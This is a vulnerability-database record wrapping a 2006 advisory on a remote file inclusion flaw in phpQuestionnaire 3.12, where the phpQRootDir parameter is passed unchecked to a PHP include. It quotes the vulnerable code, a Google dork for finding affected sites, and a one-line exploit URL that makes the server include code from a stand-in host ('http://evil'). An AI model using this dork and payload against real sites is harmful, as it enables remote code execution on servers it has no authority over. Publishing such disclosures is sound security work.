DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:06:03", "references": [], "description": "\nphpQuestionnaire 3.12 - phpQRootDir Remote File Inclusion", "edition": 1, "reporter": "Solpot", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-09-21T00:00:00", "title": "phpQuestionnaire 3.12 - phpQRootDir Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-09-21T00:00:00", "id": "EXPLOITPACK:63DB184C8D5B88EC2319990B3457AD20", "href": "", "viewCount": 4, "sourceData": "#############################SolpotCrew Community################################\n#\n# phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion\n#\n# vendor : http://www.chumpsoft.com/products/phpq/\n#\n#################################################################################\n#\n#\n# Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)\n#\n# contact: chris_hasibuan@yahoo.com\n#\n# Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt\n#\n################################################################################\n#\n#\n# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid\n# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa\n# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo\n# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX\n# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^\n# and all member solpotcrew community\n# especially thx to str0ke @ milw0rm.com\n#\n###############################################################################\nInput passed to the \"GLOBALS[phpQRootDir]\" is not properly verified\nbefore being used to include files. This can be exploited to execute\narbitrary PHP code by including files from local or external resources.\n\ncode from inc/ifunctions.php\n\n################################################################################\n# phpQuestionnaire Version 3.12 #\n# Copyright 2003-2006 chumpsoft, inc. August 7, 2006 #\n# http://www.chumpsoft.com/products/phpq/ support@chumpsoft.com #\n################################################################################\n# Use of this program constitutes your agreement to the terms contained in the #\n# LICENSE file within this distribution. #\n################################################################################\n\ninclude($GLOBALS[\"phpQRootDir\"] . \"inc/tableformat.php\");\n\nfunction ImportSurvey ($fp, $type, $flag) {\n set_time_limit(600); # Attempt to disable time limit in case upgrade takes long\n\n\ngoogle dork : \"phpQuestionnaire v3\"\n\nexploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil\n\n##############################MY LOVE JUST FOR U RIE#########################\n######################################E.O.F##################################\n\n# milw0rm.com [2006-09-21]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645800126, "score": 1659818015}, "_internal": {"score_hash": "9ca7019ecdaf97aa0dcf5ef628cae0cc"}}

{}